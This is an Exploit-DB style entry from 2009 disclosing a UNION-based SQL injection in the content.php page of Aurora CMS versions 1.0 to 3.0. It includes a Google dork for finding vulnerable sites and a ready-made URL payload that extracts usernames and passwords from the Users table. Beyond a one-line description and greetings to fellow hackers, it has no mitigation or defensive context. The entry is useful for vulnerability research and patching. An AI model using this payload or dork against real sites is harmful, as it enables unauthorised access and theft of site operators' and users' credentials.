Aurora CMS Remote SQL Injection Exploit

2009-12-22T00:00:00
ID EDB-ID:10609
Type exploitdb
Reporter Sora
Modified 2009-12-22T00:00:00

Description

Aurora CMS Remote SQL Injection Exploit. Webapps exploit for php platform

                                        
                                            # Exploit Title: Aurora CMS Remote SQL Injection Exploit [content.php]
# Date: December 22nd, 2009
# Author: Sora
# Software Link: http://www.auroracms.com.au/
# Version: 1.0, 2.0, and 3.0
# Tested on: Windows and Linux
------------------------------------------------
> Aurora CMS Remote SQL Injection Exploit
> Vulnerability in: content.php
> Found and disclosed by: Sora
> Contact: vhr95zw [at] hotmail.com

> Google dork: "Aurora CMS"

Aurora CMS suffers a remote SQL injection exploit in content.php.

The type is UNION statement SQL injection.

# Code: http://www.site.com/content.php?id=-5+UNION+SELECT+ALL+1,2,3,4,group_concat(Username,0x3a,Password)+from+Users--

# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!